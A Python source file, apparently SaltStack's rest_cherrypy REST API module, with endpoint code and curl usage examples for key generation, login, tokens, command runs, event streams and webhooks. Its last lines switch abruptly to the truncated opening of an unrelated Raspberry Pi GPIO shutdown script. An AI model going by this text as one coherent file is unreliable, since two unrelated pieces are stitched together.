.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], []).copy()
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for eauth %r, and user %r.",
token.get("eauth"),
token.get("name"),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token:
# We want to at least make sure that the token isn't expired yet.
resolved_tkn = self.resolver.get_token(salt_token)
if resolved_tkn and resolved_tkn.get("expire", 0) > time.time():
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n"
while True:
# make sure the token is still valid
if not self._is_valid_token(auth_token):
logger.debug("Token is no longer valid")
break
data = next(stream)
yield "tag: {}\n".format(data.get("tag", ""))
yield "data: {}\n\n".format(salt.utils.json.dumps(data))
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(salt.utils.json.dumps(data)),
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
batocera_safeshutdown.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import os
import time
import subprocess
from multiprocessing import Process
#initialize pins
powerPin = 3 #pin 5
ledPin = 14 #TXD - pin 8
resetPin = 2 #pin 3
powerenPin = 4 #pin 7
#initialize GPIO settings
def init():
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(powerPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
